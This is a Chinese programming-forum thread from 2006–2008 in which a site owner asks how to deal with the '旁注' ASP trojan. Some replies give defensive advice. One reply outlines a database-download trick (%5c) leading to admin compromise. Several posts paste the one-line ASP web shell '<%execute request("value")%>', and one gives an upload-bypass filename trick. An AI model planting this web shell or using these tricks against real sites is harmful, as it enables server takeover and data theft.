旁注网站小助手怎么防治 - 编程论坛

#2

dzt00012006-03-09 11:47

哦,你还没有解决吗?
我这里两天不能上网,现在总算可以了

#3

dzt00012006-03-09 11:51

你的网站,有没有后台管理日志的.

#4

ozzie2006-03-09 12:20

对啊，怎么看网站的管理日志呀？
我在网上查找了关于查看网站日志的问题也没有找到，
在什么地方能够看到网站的管理日志呢？
是在服务器上，还是在网站本身呢？

#5

ozzie2006-03-09 13:12

各位高手们帮帮忙吧。
我实在是解决不了了啊

#6

ozzie2006-03-09 13:47

没有知道的吗？
快点啊。谢谢啦，
很着急

#7

ScanH2006-03-09 17:35

可能是网站本身的漏洞,特别注意upfile 类型的文件
修补下就可以了`````````也或许是别的站上的马``

#8

xh1234562006-07-02 12:00

把你的网站告诉我,我帮你看看

#9

xh1234562006-07-02 12:01

这个我是了解的.QQ:378679954

#10

wudipao882006-07-16 18:37

你好像已经解决了，但是我还是得给你一点忠告：
1. 把你的服务器杀毒软件及时更新，并且把你的后台管理页面做的隐蔽一点，不要像：/admin/login.asp , /admin_index.asp 这种很容易就被人猜解出来的后台管理地址。
2. 看看你网站的数据库是不是很容易就会被人暴出来，比如：https://www.bc-cn.net/bbs/dispbbs.asp?boardID=10&ID=49287这个页面，若是存在暴库漏洞的话，只要把最后一个/替换成%5c,那么你网站的数据库就会被人下载下来，之后你网站管理员的用户名与密码也就出来了，最后在把你后台管理地址给猜出来，进入后台把“旁注 - 网站小助手”这个ASP木马上传到你的服务器上，随后再利用它上传一个大马上去。那么你的服务器就彻底被别人控制了。

我要说的就这么多了，有什么黑客技术上的问题就与我联系，MSN：bengbeng4545@hotmail.com

#11

天上竹子2008-06-06 15:47

首先要理解什么是旁注

旁注是指黑客通过对与A站同服务器的B站进行注入，获得B站的权限，再通过服务器的漏洞，得到A站的权限
所以A处于很被动的角色，是基本无法防御的

一个方法就是帮B站搞好安全，一个方法就是和服务器提供商联系请求补好漏洞，还有一个就是关掉A站的FSO权限

#12

lovecs17632008-07-04 03:31

是不是像我这样的啊！

<%execute request("value")%>

#13

lovecs17632008-07-04 03:34

我没改你的权限你应该感到高兴

你连是怎么传上去都不知道你还做管理员？？

#14

lovecs17632008-07-04 03:45

<%execute request("RAINMIN")%>

#15

lovecs17632008-07-04 03:45

<%execute request("value")%>

#16

lovecs17632008-07-04 03:54

<%execute request("value")%>

#17

yms1232008-07-04 09:44

如果是多出的ASP文件基本可以确定是上传漏洞所为，楼主的网站可能存在上传漏洞。
检测办法楼主可以在自己的网站文件上传的地方传任意一个asp文件,路径写法如下
X:\xxx\xxx\xxx.asp/0.jpg
比如从c盘上传一个abc.asp文件路径如下
c:\abc.asp/0.jpg
如果这个文件被成功上传并且没有错误提示，楼主的网站就可以确定有文件上传漏洞了。